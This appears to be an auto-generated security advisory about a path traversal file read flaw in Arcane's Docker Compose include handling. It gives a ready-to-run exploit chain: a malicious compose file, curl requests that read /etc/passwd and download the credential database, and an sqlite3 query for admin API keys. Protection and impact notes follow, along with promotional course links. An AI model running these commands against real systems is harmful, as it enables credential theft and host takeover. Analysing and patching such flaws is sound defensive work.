Listen to this Post
The vulnerability resides in how Arcane handles Docker Compose include directives. An authenticated user can create a project with a maliciously crafted `docker-compose.yml` file containing an `include` array that points to arbitrary system paths using path traversal sequences like ../../../../etc/passwd. The `CreateProject` service writes this compose content to disk without any validation of include paths, bypassing the safety checks present in UpdateProject. Subsequently, when the victim or the attacker themselves requests the project file via GetProjectFileContent, the system parses the include directives through ParseIncludes. This function reads include files from any location on the filesystem by design (for Docker Compose compatibility) and returns their content without first performing a path-traversal validation. The handler then matches the requested relative path against the include’s `RelativePath` (which preserves the traversal string) and serves the file content before the later `IsSafeSubdirectory` check ever runs. Because the endpoint `GET /api/environments/{id}/projects/{projectId}/file` only requires a valid Bearer or API key – no admin role – any authenticated user with the default “user” role can exploit this chain. The primitive achieved is arbitrary file read with the privileges of the Arcane backend process (typically a container). Critical targets include /app/data/arcane.db, which holds argon2 password hashes and API keys for all users, including admins. An attacker can exfiltrate these credentials, crack weak hashes offline, or directly use API keys to elevate to admin. With admin rights, the attacker can control Docker containers via Arcane’s Docker integration, leading to host RCE if the Docker socket is mounted (the default deployment scenario). The vulnerability scores Critical due to the trivial authenticated remote file read, credential disclosure, privilege escalation, and potential full host compromise.
DailyCVE Form:
Platform: Arcane
Version: <= affected
Vulnerability : Path traversal LFI
Severity: Critical
date: 2025-03-15
Prediction: 2025-03-22
What Undercode Say:
Create malicious project with include path traversal cat > evil-compose.yml <<EOF include: - '../../../../etc/passwd' services: test: image: alpine EOF Authenticate and upload curl -X POST "https://arcane.example/api/environments/1/projects" \ -H "Authorization: Bearer $USER_TOKEN" \ -F "[email protected]" Read /etc/passwd via project file API curl "https://arcane.example/api/environments/1/projects/${PROJECT_ID}/file?path=../../../../etc/passwd" \ -H "Authorization: Bearer $USER_TOKEN" Exfiltrate database curl "https://arcane.example/api/environments/1/projects/${PROJECT_ID}/file?path=../../../../app/data/arcane.db" \ -H "Authorization: Bearer $USER_TOKEN" --output arcane.db Extract admin API keys sqlite3 arcane.db "SELECT api_key FROM users WHERE role='admin';"
Exploit:
1. Authenticate as any user (default role “user”).
2. Create project with `include: [‘../../../../etc/passwd’]` in compose.
3. Call `GET /api/environments/{id}/projects/{projectId}/file?path=../../../../etc/passwd`.
- Receive content of any file readable by backend (e.g.,
/app/data/arcane.db). - Crack argon2 hashes or reuse API keys to login as admin.
- Use admin API to spawn privileged Docker containers → host RCE.
Protection:
- Patch `CreateProject` to call `validateComposeContentForUpdate` before saving.
- Apply `ValidateIncludePathForWrite` on all compose writes (create and update).
- Enforce path sanitization in `ParseIncludes` – reject absolute or dot-dot segments.
- Add role-based access: require admin for project creation or restrict file reads.
- Upgrade Arcane to version with fix (expected 2025-03-22).
Impact:
- Arbitrary file read (any file readable by Arcane backend process).
- Credential theft: password hashes & API keys of all users.
- Privilege escalation from “user” to “admin” without authentication bypass.
- Full host compromise via Docker socket abuse (container breakout to host).
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
🎓 Live Courses & Certifications:
Join Undercode Academy for Verified Certifications
🚀 Request a Custom Project:
Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]

